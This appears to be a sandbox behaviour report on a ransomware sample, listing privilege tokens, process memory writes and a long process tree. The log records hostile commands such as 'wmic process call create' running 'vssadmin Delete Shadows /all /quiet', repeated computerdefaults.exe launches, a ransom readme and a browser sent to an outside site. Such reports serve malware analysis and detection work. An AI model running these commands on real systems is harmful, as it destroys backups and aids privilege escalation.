Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (25 identical entries)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (24 identical entries)

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A (2 identical entries)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2924 wrote to memory of 2996 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\notepad.exe (2 identical entries)
PID 2924 wrote to memory of 2860 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\cmd.exe (2 identical entries)
PID 2924 wrote to memory of 4376 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmic.exe (2 identical entries)
PID 2924 wrote to memory of 4852 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\cmd.exe (2 identical entries)
PID 2924 wrote to memory of 368 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\cmd.exe (2 identical entries)
PID 368 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe (2 identical entries)
PID 4852 wrote to memory of 4628 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe (2 identical entries)
PID 4940 wrote to memory of 2028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe (2 identical entries)
PID 2860 wrote to memory of 3800 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (2 identical entries)
PID 2024 wrote to memory of 4816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe (2 identical entries)
PID 2196 wrote to memory of 4048 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\wbem\wmic.exe (2 identical entries)
PID 2196 wrote to memory of 4936 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe (2 identical entries)
PID 2196 wrote to memory of 5060 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe (2 identical entries)
PID 3800 wrote to memory of 4656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (2 identical entries)
PID 2028 wrote to memory of 1176 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wbem\wmic.exe (2 identical entries)
PID 4816 wrote to memory of 3580 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wbem\wmic.exe (2 identical entries)
PID 4936 wrote to memory of 2772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe (2 identical entries)
PID 5060 wrote to memory of 8 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe (2 identical entries)
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (28 identical entries)

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\c752934305e1b89f82798ea2c26f70b3_JaffaCakes118.dll,#1

C:\Windows\system32\notepad.exe

notepad.exe C:\Users\Public\readme.txt

C:\Windows\system32\cmd.exe

cmd /c "start http://2cc03a300254d290c0diteiyb.topsaid.site/diteiyb^&2^&55932014^&72^&273^&2219041"

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://2cc03a300254d290c0diteiyb.topsaid.site/diteiyb&2&55932014&72&273&2219041

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xbc,0x128,0x7ffeaf0546f8,0x7ffeaf054708,0x7ffeaf054718

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4080 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3444 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3444 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

